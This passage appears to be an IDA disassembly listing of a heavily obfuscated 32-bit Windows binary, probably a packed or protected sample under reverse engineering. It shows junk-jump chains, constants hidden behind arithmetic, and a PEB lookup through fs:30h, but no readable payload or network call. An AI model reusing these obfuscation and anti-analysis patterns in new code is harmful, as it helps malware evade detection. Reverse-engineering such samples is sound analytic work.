loc_425939: ; CODE XREF: sub_429E52-5610�j
popf
xchg ecx, edi
jmp loc_4281EB
; END OF FUNCTION CHUNK FOR sub_429E52
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DA2D
loc_425941: ; CODE XREF: sub_42DA2D:loc_42C4CE�j
add eax, [esp+0]
adc edx, [esp+arg_0]
add esp, 8
movzx eax, word ptr [eax]
jmp loc_42939D
; END OF FUNCTION CHUNK FOR sub_42DA2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428041
loc_425953: ; CODE XREF: sub_428041:loc_423CB8�j
cmp dword ptr [eax], 47424454h
jnz loc_4236F0
loc_42595F: ; CODE XREF: sub_428D63-2DFC�j
; sub_42D056-6C9D�j ...
jb loc_429049
push 0
push 0
push 6640FAE0h
xor [esp+10h+var_10], 6640FAF0h
jmp loc_429D40
; END OF FUNCTION CHUNK FOR sub_428041
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_82. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42597B: ; CODE XREF: _0182ofla:0042B454�j
jmp locret_42E31F
; ---------------------------------------------------------------------------
loc_425980: ; CODE XREF: _0182ofla:0042B29E�j
; DATA XREF: sub_42ACCF+9�o
mov [ebp-8], eax
mov eax, [ebp+8]
test byte ptr [eax-7], 10h
jz loc_42EC6C
inc dword ptr [ebp-8]
jmp loc_42D295
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F46
loc_425998: ; CODE XREF: sub_428F46+12E3�j
jz loc_426A11
jmp loc_4251EF
; END OF FUNCTION CHUNK FOR sub_428F46
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_4259A3: ; CODE XREF: sub_4253F4-1E94�j
jnp loc_425437
loc_4259A9: ; CODE XREF: sub_4253F4:loc_42E6E8�j
mov edi, eax
loc_4259AB: ; CODE XREF: sub_4286E4+246A�j
push 52424F24h
pop eax
xor eax, 0D2424F25h
jmp loc_429E34
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4256AD
loc_4259BC: ; CODE XREF: sub_4256AD+1438�j
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_425EE4
mov eax, [ebp-4]
add eax, 3Ch
jmp loc_42980C
; END OF FUNCTION CHUNK FOR sub_4256AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425499
loc_4259D4: ; CODE XREF: sub_425499+1F89�j
call sub_42371C
push eax
mov eax, [ebp-8]
push eax
call sub_42371C
jmp loc_423D87
; END OF FUNCTION CHUNK FOR sub_425499
; ---------------------------------------------------------------------------
or edi, 0A0B9CD8Eh
jmp loc_42C86D
; ---------------------------------------------------------------------------
pushf
jmp loc_42B5C1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D52E
loc_4259F9: ; CODE XREF: sub_42D52E:loc_42DC28�j
push ecx
jmp loc_42B12C
; END OF FUNCTION CHUNK FOR sub_42D52E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_134. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_54. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4289E4
loc_425A01: ; CODE XREF: sub_4289E4+38B0�j
jmp nullsub_150
; END OF FUNCTION CHUNK FOR sub_4289E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A181
loc_425A06: ; CODE XREF: sub_42A181+15�j
or eax, eax
jz loc_42484C
jmp loc_42DCFB
; END OF FUNCTION CHUNK FOR sub_42A181
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_425A13: ; CODE XREF: sub_423A2A:loc_42B7BB�j
call sub_426CC3
loc_425A18: ; CODE XREF: sub_423704+B6BB�j
jmp loc_428975
; END OF FUNCTION CHUNK FOR sub_423A2A
; =============== S U B R O U T I N E =======================================
sub_425A1D proc near ; DATA XREF: _0182ofla:004249C4�o
; FUNCTION CHUNK AT 0042C4B2 SIZE 0000001C BYTES
call sub_42D71D
push eax
ror eax, 11h
push ecx
jmp loc_42C4B2
sub_425A1D endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_13. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB3E
loc_425A2D: ; CODE XREF: sub_42AB3E+1743�j
; sub_42DF41:loc_42E2A4�j
jmp loc_4246E6
; END OF FUNCTION CHUNK FOR sub_42AB3E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427E42
loc_425A32: ; CODE XREF: sub_427E42-4211�j
; _0182ofla:loc_42DB28�j
jmp loc_42B5FB
; END OF FUNCTION CHUNK FOR sub_427E42
; ---------------------------------------------------------------------------
loc_425A37: ; CODE XREF: _0182ofla:00425D25�j
; _0182ofla:0042687D�j
mov ebx, 1E99C182h
; =============== S U B R O U T I N E =======================================
sub_425A3C proc near ; CODE XREF: sub_42E282-6AF0�p
; FUNCTION CHUNK AT 004242BA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00429781 SIZE 00000005 BYTES
mov [esp+0], eax
pop eax
popf
jmp loc_4242BA
sub_425A3C endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_111. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_425A47: ; CODE XREF: _0182ofla:00429E4D�j
ror eax, 1Ch
loc_425A4A: ; CODE XREF: _0182ofla:loc_4252BE�j
push ebx
push 239081A1h
pop ebx
jmp loc_424AA0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F46
loc_425A56: ; CODE XREF: sub_428F46:loc_42E4C2�j
push ecx
jmp loc_42EB13
; END OF FUNCTION CHUNK FOR sub_428F46
; =============== S U B R O U T I N E =======================================
sub_425A5C proc near ; CODE XREF: sub_42CE73-678B�p
; sub_424F35+28FA�j
xchg ecx, [esp+0]
pop ecx
add edx, 6E2059B7h
call sub_42D71D
push eax
ror eax, 12h
push edx
jmp loc_42460D
sub_425A5C endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_66. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_425A76: ; CODE XREF: sub_428F20-5433�j
jp sub_42D978
loc_425A7C: ; CODE XREF: sub_428F20:loc_425E86�j
push 4B0F7582h
pop eax
or eax, 59BE2B4Ch
xor eax, 7DCB10FEh
jmp loc_429CCC
; END OF FUNCTION CHUNK FOR sub_428F20
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425A93 proc near ; DATA XREF: sub_425305+6�o
; FUNCTION CHUNK AT 004269C7 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042A4B6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DC0C SIZE 00000013 BYTES
push ebp
mov ebp, esp
mov esp, ebp
pop ebp
mov eax, ds:dword_427A34
or eax, eax
jnz loc_4269C7
call sub_428D17
jmp loc_42A4B6
sub_425A93 endp
; =============== S U B R O U T I N E =======================================
sub_425AB1 proc near ; DATA XREF: sub_4255BB+9�o
; FUNCTION CHUNK AT 00423D51 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00427430 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A029 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042AF5C SIZE 00000005 BYTES
jnz loc_423D51
mov eax, [ebp-20h]
mov byte ptr [eax], 64h
inc dword ptr [ebp-20h]
mov eax, [ebp-20h]
jmp loc_427430
sub_425AB1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428205
loc_425AC8: ; CODE XREF: sub_42EAB7-2372�j
; sub_428205:loc_42D632�j
mov [ebp-1Ch], eax
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
and eax, 0FFh
mov eax, ds:dword_42BD04[eax*4]
mov [ebp-8], eax
jmp loc_42AD8D
; END OF FUNCTION CHUNK FOR sub_428205
; =============== S U B R O U T I N E =======================================
sub_425AE5 proc near ; CODE XREF: sub_425BF8+4F9�p
; _0182ofla:0042B838�j
xchg edi, [esp+0]
pop edi
mov edx, [ebx+ecx]
xor edx, [ebx+ecx+4]
cmp edx, 7C61090Eh
loc_425AF6: ; CODE XREF: sub_428FED:loc_429F07�j
push offset loc_42AE2B
jmp nullsub_23
sub_425AE5 endp
; =============== S U B R O U T I N E =======================================
sub_425B00 proc near ; DATA XREF: sub_427942+1B7E�o
; FUNCTION CHUNK AT 00425C50 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004261C0 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042644B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426821 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00426DAB SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00427016 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428939 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00428A5A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428ABF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428DDF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00429088 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042A76D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042AF9D SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042C8E0 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042CB94 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D073 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D2B1 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042D37E SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042D9C8 SIZE 00000011 BYTES
jz loc_425B13
push ebp
mov eax, [ebp-20h]
call sub_42CA48
pop ecx
mov [ebp-20h], eax
loc_425B13: ; CODE XREF: sub_425B00�j
; sub_427942+E6B�j ...
jnz loc_42D2B1
test byte ptr [ebp-7], 8
jmp loc_428ABF
sub_425B00 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_425B22: ; CODE XREF: sub_42798F+6B�j
jz loc_428547
call sub_42892E
test al, al
jz loc_428547
jmp loc_42B7C0
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
loc_425B3A: ; DATA XREF: sub_4256AD+3E7C�o
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_425EE4
call sub_4249DB
loc_425B4C: ; CODE XREF: _0182ofla:0042D480�j
push ebp
; START OF FUNCTION CHUNK FOR sub_426B01
loc_425B4D: ; CODE XREF: sub_426B01:loc_42D471�j
add edi, 61CB9376h
xchg edi, [esp+0]
jmp loc_42E07A
; END OF FUNCTION CHUNK FOR sub_426B01
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DF41
loc_425B5B: ; CODE XREF: sub_42DF41:loc_4262FC�j
jz loc_42AF61
loc_425B61: ; CODE XREF: sub_42DF41-8A55�j
jmp loc_42D45A
; END OF FUNCTION CHUNK FOR sub_42DF41
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AAF8
loc_425B66: ; CODE XREF: sub_42AAF8:loc_42A2E8�j
mov [esp+4+var_4], eax
jmp loc_427583
; END OF FUNCTION CHUNK FOR sub_42AAF8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425B6E proc near ; CODE XREF: sub_423B53+4�j
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_10 = dword ptr 18h
; FUNCTION CHUNK AT 004232BA SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004232F5 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042331C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004242E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424847 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424964 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00424D33 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042518C SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004255D4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425D2A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004264DD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426F33 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0042755A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042757E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00427703 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427A8F SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00428558 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428825 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428ABA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A0FA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042A818 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 0042B83D SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042CC0B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042E597 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042E8CD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E9BD SIZE 0000000F BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
cmp ds:dword_42D214, 0
jnz loc_42A0FA
jmp loc_427703
sub_425B6E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_425B86: ; CODE XREF: _0182ofla:004265B1�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E648
loc_425B87: ; CODE XREF: sub_42E648+7�j
jmp loc_428EDB
; END OF FUNCTION CHUNK FOR sub_42E648
; ---------------------------------------------------------------------------
loc_425B8C: ; CODE XREF: _0182ofla:00426D2F�j
jmp locret_4290E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426455
loc_425B91: ; CODE XREF: sub_426455+18�j
jmp loc_427491
; END OF FUNCTION CHUNK FOR sub_426455
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428041
loc_425B96: ; CODE XREF: sub_428041+13�j
add ebx, 20EF038Ah
popf
push offset loc_42DB71
jmp loc_42D119
; END OF FUNCTION CHUNK FOR sub_428041
; ---------------------------------------------------------------------------
and ebp, 0F01E2938h
jmp sub_424707
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B43
loc_425BB2: ; CODE XREF: sub_423B43+94B4�j
shl esi, 0Eh
shr esi, 0Ah
jmp loc_425F7E
; END OF FUNCTION CHUNK FOR sub_423B43
; ---------------------------------------------------------------------------
loc_425BBD: ; CODE XREF: _0182ofla:loc_42DF9C�j
push 29733297h
pop eax
add eax, 0D6CEFEF9h
push offset sub_426BCE
jmp locret_4246B8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_107. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423127
loc_425BD4: ; CODE XREF: sub_423127+78B9�j
jmp loc_4288C6
; END OF FUNCTION CHUNK FOR sub_423127
; ---------------------------------------------------------------------------
push 7D950B8Bh
pop edx
rol edx, 1Eh
cmp edx, 62488C8Bh
jmp loc_42CEE5
; =============== S U B R O U T I N E =======================================
sub_425BED proc near ; CODE XREF: sub_42913D+5�p
; _0182ofla:0042A2B9�j
; FUNCTION CHUNK AT 00427840 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042E070 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EA4E SIZE 00000013 BYTES
mov [esp+0], edx
pop edx
jnz loc_42EA4E
retn
sub_425BED endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_425BF8 proc near ; CODE XREF: sub_4296F0+C�p
; FUNCTION CHUNK AT 00423448 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00424816 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042550D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042567C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042570D SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00425D41 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004260E5 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004266F2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427EF9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428FFC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00429313 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00429F11 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042AE31 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042CA88 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CC29 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D4BE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042ED73 SIZE 00000033 BYTES
push ebx
push ecx
mov eax, large fs:30h
mov eax, [eax+0Ch]
jmp loc_42570D
sub_425BF8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_425C09: ; CODE XREF: sub_4253F4:loc_42838F�j
pop esi
mov dword ptr [ebp-0Ch], 1
; END OF FUNCTION CHUNK FOR sub_4253F4
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_425C11: ; CODE XREF: sub_42B15E-73F1�j
; _0182ofla:0042DF0C�j
lea eax, [ebp-14h]
push eax
push 4
push 28h
push 2779F65Bh
jmp loc_423018
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_425C23: ; CODE XREF: sub_42798F-23D9�j
ror eax, 7
mov ds:dword_424C18, eax
retn
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1B2
loc_425C2D: ; CODE XREF: sub_42C1B2+1�j
jmp loc_424744
; END OF FUNCTION CHUNK FOR sub_42C1B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E218
loc_425C32: ; CODE XREF: sub_42E218�j
push eax
jmp loc_428C17
; END OF FUNCTION CHUNK FOR sub_42E218
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4258F5
loc_425C38: ; CODE XREF: sub_4258F5:loc_42C9F8�j
cmp [ebp+var_1], 0
jz loc_427E24
loc_425C42: ; CODE XREF: _0182ofla:loc_426960�j
mov [ebp+var_8], 1
; END OF FUNCTION CHUNK FOR sub_4258F5
; START OF FUNCTION CHUNK FOR sub_429A64
loc_425C49: ; CODE XREF: sub_429A64:loc_426CBD�j
; _0182ofla:00426DA6�j
mov eax, [ebp-8]
pop ecx
pop ecx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_429A64
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B00
loc_425C50: ; CODE XREF: sub_425B00+2E48�j
jmp loc_4261C0
; END OF FUNCTION CHUNK FOR sub_425B00
; =============== S U B R O U T I N E =======================================
sub_425C55 proc near ; CODE XREF: _0182ofla:00424E93�j
; sub_425B6E+13D1�p
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00423604 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00423CDF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428577 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042A0F0 SIZE 0000000A BYTES
xchg ebx, [esp+0]
pop ebx
mov [edi], eax
pop edi
cmp ds:dword_42D214, 0
jnz loc_42A0F0
jmp loc_423CDF
sub_425C55 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_425C6E: ; CODE XREF: sub_42798F:loc_427A38�j
pushf
push 2D59C373h
pop ecx
add ecx, 0D2A6407Eh
popf
xor edx, edx
div ecx
mov [ebp-14h], edx
jmp loc_429BAF
; END OF FUNCTION CHUNK FOR sub_42798F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_195. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_425C89 proc near ; CODE XREF: sub_425153+4�p
; sub_42E734+2�p
; FUNCTION CHUNK AT 00423C36 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00427159 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042722F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004278B2 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00428681 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A1CE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042AEF7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CEF0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E3EE SIZE 00000014 BYTES
push ebp
mov ebp, esp
xchg ecx, ebx
push ebx
jmp loc_42CEF0
sub_425C89 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_425C94: ; CODE XREF: sub_42798F:loc_4274E8�j
and ebx, ecx
loc_425C96: ; CODE XREF: _0182ofla:loc_42CD65�j
cdq
jmp loc_427A9C
; END OF FUNCTION CHUNK FOR sub_42798F
; =============== S U B R O U T I N E =======================================
sub_425C9C proc near ; CODE XREF: sub_426851+102F�p
; _0182ofla:0042A0CA�j
xchg edx, [esp+0]
pop edx
push 5AAD8B59h
loc_425CA5: ; CODE XREF: _0182ofla:loc_4234F0�j
sub dword ptr [esp+0], 5AAD8B59h
jmp sub_427F32
sub_425C9C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424707
loc_425CB1: ; CODE XREF: sub_424707+7E30�j
push ecx
jmp loc_42D1E8
; END OF FUNCTION CHUNK FOR sub_424707
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426993
loc_425CB7: ; CODE XREF: sub_426993+3CC3�j
; sub_42B15E:loc_42D16E�j
cdq
jge sub_42D6DD
popf
jmp loc_42E53D
; END OF FUNCTION CHUNK FOR sub_426993
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_202. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 42E03D2h
jmp sub_42CD44
; ---------------------------------------------------------------------------
test al, al
jz loc_4277B2
jmp loc_42C186
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9A4
loc_425CDC: ; CODE XREF: sub_42D9A4:loc_42977C�j
jge loc_42B305
; END OF FUNCTION CHUNK FOR sub_42D9A4
; START OF FUNCTION CHUNK FOR sub_42D978
loc_425CE2: ; CODE XREF: sub_42D978+C�j
jmp loc_42E61A
; END OF FUNCTION CHUNK FOR sub_42D978
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E218
loc_425CE7: ; CODE XREF: sub_42E218-156A�j
jmp loc_424DA2
; END OF FUNCTION CHUNK FOR sub_42E218
; ---------------------------------------------------------------------------
xchg ecx, [ebp+0]
popf
sub ecx, esi
xchg ecx, edx
jmp loc_42B2FF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_125. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42583B
loc_425CFA: ; CODE XREF: sub_42583B+7103�j
jmp loc_428E35
; END OF FUNCTION CHUNK FOR sub_42583B
; ---------------------------------------------------------------------------
loc_425CFF: ; CODE XREF: _0182ofla:0042C2C7�j
jmp loc_42DD4D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CC59
loc_425D04: ; CODE XREF: sub_42CC59-4FF9�j
jmp nullsub_117
; END OF FUNCTION CHUNK FOR sub_42CC59
; ---------------------------------------------------------------------------
loc_425D09: ; CODE XREF: _0182ofla:00427983�j
call sub_42B1F9
; START OF FUNCTION CHUNK FOR sub_42DD2A
loc_425D0E: ; CODE XREF: sub_42DD2A:loc_42E0D1�j
jnz loc_4286BA
jmp loc_42D78F
; END OF FUNCTION CHUNK FOR sub_42DD2A
; ---------------------------------------------------------------------------
loc_425D19: ; CODE XREF: _0182ofla:00426E60�j
test eax, 6E525A10h
jmp loc_42E868
; ---------------------------------------------------------------------------
pushf
jmp loc_425A37
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_425D2A: ; CODE XREF: sub_425B6E-594�j
cdq
jmp loc_42518C
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_425D30: ; CODE XREF: sub_428D63-523B�j
; sub_426E6A+35A1�j
add ecx, 9F388F12h
mov ecx, [ecx]
xchg ecx, [esp+4+var_4]
retn
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
loc_425D3C: ; CODE XREF: _0182ofla:0042E87A�j
jmp locret_42CA7C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BF8
loc_425D41: ; CODE XREF: sub_425BF8+78CF�j
jmp nullsub_140
; END OF FUNCTION CHUNK FOR sub_425BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42719D
loc_425D46: ; CODE XREF: sub_42719D+B�j
jmp loc_427D77
; END OF FUNCTION CHUNK FOR sub_42719D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C8C0
loc_425D4B: ; CODE XREF: sub_42C8C0:loc_42D29A�j
mov edx, [edi]
xchg eax, [ebp+0]
pushf
ror eax, 0Fh
push 0F1F41E71h
jmp loc_42A786
; END OF FUNCTION CHUNK FOR sub_42C8C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429AA3
loc_425D5E: ; CODE XREF: sub_429AA3-51DE�j
pop edi
xor edi, 0FB0D3CFBh
add edi, ebp
add edi, 30AD2C22h
mov [edi], eax
pop edi
call sub_424A70
; END OF FUNCTION CHUNK FOR sub_429AA3
; START OF FUNCTION CHUNK FOR sub_42D1AE
loc_425D75: ; CODE XREF: sub_42D1AE+9�j
jmp nullsub_133
; END OF FUNCTION CHUNK FOR sub_42D1AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A642
loc_425D7A: ; CODE XREF: sub_42A642-22CA�j
rol eax, 19h
call sub_427EF0
not esi
jmp sub_424E62
; END OF FUNCTION CHUNK FOR sub_42A642
; ---------------------------------------------------------------------------
loc_425D89: ; CODE XREF: _0182ofla:004241F3�j
jz sub_42CE73
; =============== S U B R O U T I N E =======================================
sub_425D8F proc near ; CODE XREF: sub_428336+49C9�p
xchg edx, [esp+0]
loc_425D92: ; CODE XREF: _0182ofla:0042CB21�j
pop edx
mov [edi], eax
call sub_42AB3E
sub_425D8F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_425D9A proc near ; CODE XREF: sub_42AAD2:loc_42AF52�j
push ebp
push offset loc_4264C6
jmp nullsub_77
sub_425D9A endp
; =============== S U B R O U T I N E =======================================
sub_425DA5 proc near ; CODE XREF: _0182ofla:0042540A�j
; _0182ofla:0042A1F4�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042397A SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004239FE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423A59 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004248F3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425852 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00426B0A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004275E2 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00428285 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00428696 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429356 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004294CA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A1B0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042B25D SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042B56F SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042B597 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042B61B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0042CD54 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042DA3D SIZE 0000000B BYTES
xchg ecx, [esp+4+var_4]
pop ecx
mov [ebp-4], eax
call sub_428EF6
loc_425DB1: ; DATA XREF: sub_42935B+1�o
mov [esp+0], ebp
mov ebp, esp
call sub_427CDE
loc_425DBB: ; CODE XREF: _0182ofla:0042E033�j
jmp loc_42397A
sub_425DA5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_425DC0: ; CODE XREF: _0182ofla:00424EA3�j
jmp locret_4276FD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4254D3
loc_425DC5: ; CODE XREF: sub_4254D3:loc_426EC7�j
mov eax, [ebp+arg_0]
test byte ptr [eax-8], 80h
jz loc_42A500
inc [ebp+var_8]
loc_425DD5: ; CODE XREF: sub_4254D3:loc_423B19�j
; sub_4254D3:loc_42A51A�j
